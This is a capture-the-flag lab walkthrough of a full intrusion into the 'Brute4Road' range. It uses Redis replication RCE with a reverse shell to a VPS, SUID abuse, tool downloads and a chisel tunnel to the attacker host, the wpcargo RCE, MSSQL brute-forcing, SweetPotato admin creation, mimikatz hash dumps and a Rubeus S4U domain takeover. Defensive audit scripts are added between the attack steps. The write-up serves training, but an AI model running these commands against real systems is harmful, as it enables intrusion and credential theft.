Preface
References:
https://fushuling.com/index.php/2023/09/03/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7brute4road/
https://exp10it.io/2023/08/chunqiuyunjing-brute4road-writeup/
Redis master-slave replication RCE
Scan with fscan
./fscan -h 39.98.118.103 -p 1-65535
The scan immediately turns up an unauthenticated Redis instance, which is open to master-slave replication RCE: https://github.com/n0b0dyCN/redis-rogue-server
python3 redis-rogue-server.py --rhost 39.98.118.103 --lhost vps
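The first IP address is the challenge target and the second is your own VPS; remember to open port 21000. Once it succeeds, choose a bind shell or a reverse shell, then enter the address and port to connect back to.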
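A defensive check for the finding above, added here as an example (not code from the original post or from the referenced tool): it audits a redis.conf for the settings that leave an instance reachable without authentication, and for the replication, module and config commands still being callable. The sample configs and finding names are constructed, and the check assumes a standalone instance that inspects only `requirepass`, not ACL users.

```python
import ipaddress
import shlex

# Commands the replication-based attack class relies on. Assumption of this
# example: a standalone instance that does not itself need replication.
SENSITIVE_COMMANDS = ("SLAVEOF", "REPLICAOF", "MODULE", "CONFIG")

# Constructed sample: settings that produce the scanner finding above.
WEAK_CONF = """\
# constructed sample
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed sample: the same instance after hardening.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass "constructed-example-secret"
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command CONFIG ""
"""


def parse_redis_conf(text):
    """Return {directive: [argument list of each occurrence]}."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            parts = shlex.split(line)  # handles quoted and empty ("") values
        except ValueError:
            continue  # unbalanced quote: skip the line
        if parts:
            conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def _is_loopback(addr):
    addr = addr.lstrip("-")  # Redis 6.2+ allows a '-' prefix on bind addresses
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False  # '*' or anything unparsable is treated as exposed


def audit(text):
    """Return a list of finding names for the given redis.conf text."""
    conf = parse_redis_conf(text)
    findings = []

    # No bind directive means Redis listens on every interface.
    binds = conf.get("bind", [[]])[-1]
    exposed = not binds or not all(_is_loopback(a) for a in binds)
    if exposed:
        findings.append("listens-beyond-loopback")

    pm = conf.get("protected-mode", [["yes"]])[-1]
    protected_off = bool(pm) and pm[0].lower() == "no"
    if protected_off:
        findings.append("protected-mode-off")

    pw = conf.get("requirepass", [[]])[-1]
    no_password = not pw or pw[0] == ""
    if no_password:
        findings.append("no-password")

    # All three together: any host that can reach the port can issue commands.
    if exposed and protected_off and no_password:
        findings.append("unauthenticated-remote-access")

    # A rename-command entry (renamed or disabled with "") counts as handled.
    handled = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for cmd in SENSITIVE_COMMANDS:
        if cmd not in handled:
            findings.append("command-available:" + cmd)
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text))
```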
base64 privilege escalation
Command to test for privilege escalation
find / -user root -perm -4000 -print 2>/dev/null
base64 can clearly be used for privilege escalation; flag1 is found under /home/redis/flag/
base64 "/home/redis/flag/flag01" | base64 --decode
flag01: flag{53e1be23-fcbc-4371-ac73-7b8185500892}
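The same check from the defender's side, as an added example that is not part of the original post: it parses setuid/setgid inventory output, keeps the setuid-root entries, and reports those outside an expected baseline together with the command that removes the bit. The `-printf` format, the baseline and the sample listing are assumptions constructed for this example.

```python
import shlex

# Assumed baseline of setuid-root binaries for this host (constructed);
# build the real one from a known-good image of the same distribution.
EXPECTED_SUID = frozenset({
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/gpasswd",
})

# Constructed output of (GNU find):
#   find / -xdev -type f -perm /6000 -printf '%m %u %p\n' 2>/dev/null
SAMPLE_FIND_OUTPUT = """\
4755 root /usr/bin/passwd
4755 root /usr/bin/su
4755 root /usr/bin/sudo
4755 root /usr/bin/mount
4755 root /usr/bin/base64
6755 root /usr/bin/newgrp
2755 root /usr/bin/wall
4755 redis /opt/tools/helper
4755 root /opt/backup tools/reader
"""


def parse_find_output(text):
    """Parse '<octal mode> <owner> <path>' lines into (mode, owner, path)."""
    records = []
    for line in text.splitlines():
        fields = line.split(None, 2)  # the path may itself contain spaces
        if len(fields) != 3:
            continue
        mode_s, owner, path = fields
        try:
            mode = int(mode_s, 8)
        except ValueError:
            continue
        records.append((mode, owner, path))
    return records


def unexpected_suid_root(records, baseline=EXPECTED_SUID):
    """Setuid (04000) files owned by root that are not in the baseline."""
    return sorted(
        path
        for mode, owner, path in records
        if mode & 0o4000 and owner == "root" and path not in baseline
    )


def remediation(paths):
    """Commands that drop the setuid bit, with paths quoted for the shell."""
    return ["chmod u-s " + shlex.quote(p) for p in paths]


if __name__ == "__main__":
    flagged = unexpected_suid_root(parse_find_output(SAMPLE_FIND_OUTPUT))
    for cmd in remediation(flagged):
        print(cmd)
```

A general-purpose utility such as base64 running setuid root reads any file with root's permissions, which is why it stands out against the baseline.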
Information gathering
Use wget to download the files we need
wget vps:80/fscan
Note that if neither ifconfig nor ip addr is available, you can read /etc/hosts to get the internal network range
Start the fscan scan
./fscan -h 172.22.2.7/24
[2025-02-24 23:43:16] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.16
主机名: MSSQLSERVER
发现的网络接口:
IPv4地址:
└─ 172.22.2.16
[2025-02-24 23:43:16] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.3
主机名: DC
发现的网络接口:
IPv4地址:
└─ 172.22.2.3
[2025-02-24 23:43:16] [INFO] 系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393]
[2025-02-24 23:43:16] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.34
主机名: CLIENT01
发现的网络接口:
IPv4地址:
└─ 172.22.2.34
[2025-02-24 23:43:16] [INFO] 系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393]
[2025-02-24 23:43:16] [SUCCESS] 网站标题 http://172.22.2.7 状态码:200 长度:4833 标题:Welcome to CentOS
[2025-02-24 23:43:16] [SUCCESS] NetBios 172.22.2.34 XIAORANG\CLIENT01
[2025-02-24 23:43:16] [SUCCESS] 网站标题 http://172.22.2.16 状态码:404 长度:315 标题:Not Found
[2025-02-24 23:43:16] [SUCCESS] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-02-24 23:43:16] [SUCCESS] NetBios 172.22.2.3 DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-02-24 23:43:16] [SUCCESS] 匿名登录成功!
[2025-02-24 23:43:16] [SUCCESS] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[2025-02-24 23:43:16] [SUCCESS] SMB认证成功 172.22.2.18:445 administrator:123456
[2025-02-24 23:43:16] [SUCCESS] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[2025-02-24 23:43:16] [INFO] SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$]
[2025-02-24 23:43:17] [SUCCESS] 网站标题 http://172.22.2.18 状态码:200 长度:57738 标题:又一个WordPress站点
[2025-02-24 23:43:18] [INFO] SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$]
[2025-02-24 23:43:24] [SUCCESS] SMB认证成功 172.22.2.16:445 admin:123456
Upload chisel to set up a proxy
./chisel server -p 33322 --reverse
./chisel client vpsip:33322 R:0.0.0.0:44543:socks
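WordPress wpcargo vulnerability
Start with the WordPress site and scan it with wpscan. It seems the api-token can't be used because the VPS is in mainland China, so scan the plugins first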
proxychains -q wpscan --url http://172.22.2.18/
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://172.22.2.18/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.22.2.18/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://172.22.2.18/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.22.2.18/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
| Found By: Rss Generator (Passive Detection)
| - http://172.22.2.18/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
| - http://172.22.2.18/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>
[+] WordPress theme in use: twentytwentytwo
| Location: http://172.22.2.18/wp-content/themes/twentytwentytwo/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://172.22.2.18/wp-content/themes/twentytwentytwo/readme.txt
| [!] The version is out of date, the latest version is 1.9
| Style URL: http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2
| Style Name: Twenty Twenty-Two
| Style URI: https://wordpress.org/themes/twentytwentytwo/
| Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wpcargo
| Location: http://172.22.2.18/wp-content/plugins/wpcargo/
| Last Updated: 2024-08-08T17:00:00.000Z
| [!] The version is out of date, the latest version is 7.0.6
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 6.x.x (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:03 <==========================================================================================> (137 / 137) 100.00% Time: 00:00:03
[i] No Config Backups Found.
Start looking for vulnerabilities from the plugin
The wpcargo plugin has an unauthenticated RCE:
https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a/
https://github.com/biulove0x/CVE-2021-25003
Once in, set up persistence first
Connect with AntSword through the proxy and look at wp-config.php first
This gives the database credentials
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'wpuser' );
/** Database password */
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );
/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );
mysql & mssql
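Connect over mysqli with AntSword's built-in database feature
AntSword inexplicably glitched when running the query
So switch to MDUT and upload the HTTP tunnel file
That won't connect either, so it seems socks can't be used; the only option is to run it on the command line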
mysql -uwpuser -p'WpuserEha8Fgj9' -e 'use f1aagggghere;select * from flag02;'
mysql -uwpuser -p'WpuserEha8Fgj9' -e 'use f1aagggghere;select pAssw0rd from S0meth1ng_y0u_m1ght_1ntereSted;' > 1.txt
flag02: flag{c757e423-eb44-459c-9c63-7625009910d8}
S0meth1ng_y0u_m1ght_1ntereSted is a password table
Use this password table with fscan to brute-force the mssql service on 172.22.2.16
./fscan -h 172.22.2.16 -m mssql -pwdf 1.txt
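This yields the password ElGNkOiC
I still need MDUT to connect, but I couldn't be bothered to set up an HTTP proxy, and there is now a newer project that supports socks5: https://github.com/DeEpinGh0st/MDUT-Extend-Release
Next comes privilege escalation
SweetPotato privilege escalation & RDP
With that Ole component enabled, uploads work normally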
netstat -ano
Port 3389 is open, so here we create a user for ourselves and RDP in
C:/Users/Public/sweetpotato.exe -a "net user 0w0 qwer1234! /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators 0w0 /add"
This gets the third flag
flag03: flag{5a85de41-3fe1-4d90-9b38-1c1100fad198}
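Constrained delegation
systeminfo shows that we are in a domain environment
Upload mimikatz, then run the exe as administrator; it can dump the passwords of domain users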
privilege::debug
sekurlsa::logonpasswords
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 93540 (00000000:00016d64)
Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:31
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 91986 (00000000:00016752)
Session : Service from 0
User Name : ReportServer
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:31
SID : S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/2/24 23:14:30
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 63620 (00000000:0000f884)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/24 23:14:30
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : MSSQLSERVER$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/2/24 23:14:15
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : mssqlserver$
* Domain : XIAORANG.LAB
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
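Looking through the output, we can see the MSSQLSERVER$ account. MSSQLSERVER is configured with constrained delegation to the domain controller, so S4U can be used to forge a high-privilege ST and take over the DC. It also appears that only this account's NTLM hash is usable. We use Rubeus to request a ticket for the account itself: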
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:7fa2072ba3c4eaf6713d45095efd01ef /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
Once the ticket has been obtained, inject it:
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 ticket from the asktgt output>
This gives us the flag:
flag04: flag{323be6d4-137b-4d8e-ad3e-f92f5ba469c6}
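The last step works because a machine account is allowed to delegate to a service on the domain controller and Administrator may be impersonated through it. The following audit is an added example, not part of the original writeup: it flags both conditions from an exported account list. The records, the DC host names and the privileged-account list are constructed sample data and assumptions; only the userAccountControl bit values are the real ones.

```python
# Added example: audit constrained-delegation exposure from directory records.
# The records below are constructed sample data, not output from the lab.
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self for any user)

# Hypothetical export of sAMAccountName, userAccountControl,
# msDS-AllowedToDelegateTo and Protected Users membership.
ACCOUNTS = [
    {"sam": "MSSQLSERVER$", "uac": 0x1000 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "delegate_to": ["CIFS/DC.xiaorang.lab"], "protected": False},
    {"sam": "CLIENT01$", "uac": 0x1000, "delegate_to": [], "protected": False},
    {"sam": "Administrator", "uac": 0x200, "delegate_to": [], "protected": False},
    {"sam": "backupadmin", "uac": 0x200 | NOT_DELEGATED, "delegate_to": [], "protected": False},
]
DC_HOSTS = {"dc.xiaorang.lab", "dc"}            # assumed DC host names
PRIVILEGED = {"Administrator", "backupadmin"}   # assumed list of admin accounts


def spn_host(spn):
    """Return the lower-cased host part of an SPN such as CIFS/DC.xiaorang.lab:445."""
    parts = spn.split("/")
    return parts[1].split(":")[0].lower() if len(parts) > 1 else ""


def risky_delegations(accounts, dc_hosts):
    """Accounts allowed to delegate to a service hosted on a domain controller."""
    findings = []
    for acct in accounts:
        to_dc = [s for s in acct["delegate_to"] if spn_host(s) in dc_hosts]
        if to_dc:
            findings.append({
                "account": acct["sam"],
                "spns": to_dc,
                "protocol_transition": bool(acct["uac"] & TRUSTED_TO_AUTH_FOR_DELEGATION),
            })
    return findings


def impersonable_admins(accounts, privileged):
    """Privileged accounts neither flagged NOT_DELEGATED nor in Protected Users."""
    return sorted(a["sam"] for a in accounts
                  if a["sam"] in privileged
                  and not (a["uac"] & NOT_DELEGATED) and not a["protected"])


if __name__ == "__main__":
    for finding in risky_delegations(ACCOUNTS, DC_HOSTS):
        print("delegation to DC:", finding)
    print("admins exposed to S4U impersonation:", impersonable_admins(ACCOUNTS, PRIVILEGED))
```

Any account returned by the first check should have its delegation target removed or narrowed, and any account returned by the second should be marked sensitive or added to Protected Users.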